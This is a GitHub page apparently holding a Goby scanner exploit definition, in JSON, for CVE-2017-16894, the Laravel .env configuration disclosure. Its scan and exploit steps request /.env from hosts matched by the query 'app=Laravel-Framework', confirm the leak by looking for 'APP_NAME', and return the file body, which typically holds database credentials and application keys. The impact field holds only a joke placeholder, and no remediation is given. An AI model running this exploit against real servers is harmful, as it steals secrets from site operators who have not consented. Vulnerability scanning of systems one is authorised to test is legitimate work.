forked from k3vi-07/goby-exp
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathLaravel .env 配置文件泄露 CVE-2017-16894.json
78 lines (78 loc) · 2.66 KB
/
Laravel .env 配置文件泄露 CVE-2017-16894.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
{
"Name": "Laravel .env 配置文件泄露 CVE-2017-16894",
"Level": "1",
"Tags": [
"信息泄露"
],
"GobyQuery": "app=\"Laravel-Framework\"",
"Description": "Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。 Laravel framework 5.5.21及之前的版本中存在 .env 文件可被下载的信息泄露漏洞。远程攻击者可利用该漏洞获取敏感信息",
"Product": "Laravel framework <= 5.5.21",
"Homepage": "https://github.com/laravel/framework/tree/5.5",
"Author": "PeiQi",
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩🐏</span><br><br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ExpParams": [
{
"name": ".env",
"type": "select",
"value": ".env",
"show": ""
}
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/.env",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "APP_NAME",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/.env",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-24 12:19:09",
"GobyVersion": "1.8.237"
}